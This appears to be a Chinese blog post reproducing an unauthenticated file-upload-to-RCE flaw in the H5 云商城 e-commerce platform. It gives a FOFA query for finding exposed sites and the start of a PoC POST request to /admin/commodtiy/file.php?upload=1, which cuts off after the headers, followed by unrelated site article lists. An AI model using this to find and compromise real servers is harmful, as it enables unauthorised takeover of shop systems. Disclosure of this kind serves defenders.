H5 云商城 file.php 文件上传致RCE漏洞复现

0x01 产品简介

H5 云商城是一个基于 H5 技术的电子商务平台,旨在为用户提供方便快捷的在线购物体验。多平台适配:H5 云商城采用 H5 技术开发,具有良好的跨平台适配性。无论是在电脑、手机还是平板等设备上,用户都可以通过网页浏览器访问和使用云商城,无需安装额外的应用程序。

0x02 漏洞概述

由于H5 云商城 /admin/commodtiy/ 接口商品图片上传处,没有对用户传入的文件进行校验和过滤判断,导致未经身份验证的远程攻击者可直接上传恶意后门文件,执行恶意代码,获取服务器权限。

0x03 复现环境

FOFA:body="/public/qbsp.php"

0x04 漏洞复现

PoC

POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-05-11 17:16:06       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-05-11 17:16:06       100 阅读
  3. 在Django里面运行非项目文件

    2024-05-11 17:16:06       82 阅读
  4. Python语言-面向对象

    2024-05-11 17:16:06       91 阅读

热门阅读

  1. GO: 随机数

    2024-05-11 17:16:06       31 阅读
  2. 使用torch.nn.Sequential构建神经网络

    2024-05-11 17:16:06       31 阅读
  3. SpringBoot Mockito 依赖注入

    2024-05-11 17:16:06       35 阅读
  4. vue2中mixins的用法和需要注意的地方

    2024-05-11 17:16:06       28 阅读
  5. linux netstat 查看指定端口

    2024-05-11 17:16:06       33 阅读
  6. 【1分钟了解npm】

    2024-05-11 17:16:06       28 阅读
  7. 不使用EF框架实现数据库增删改查

    2024-05-11 17:16:06       31 阅读
  8. .NET_控制反转简述

    2024-05-11 17:16:06       37 阅读
  9. No signature found in package of version 2 or newer for package

    2024-05-11 17:16:06       26 阅读
  10. go-Expect-实验

    2024-05-11 17:16:06       35 阅读
  11. Linux 第二十六章

    2024-05-11 17:16:06       33 阅读
  12. vue3-seamless-scroll实现循环滚动

    2024-05-11 17:16:06       25 阅读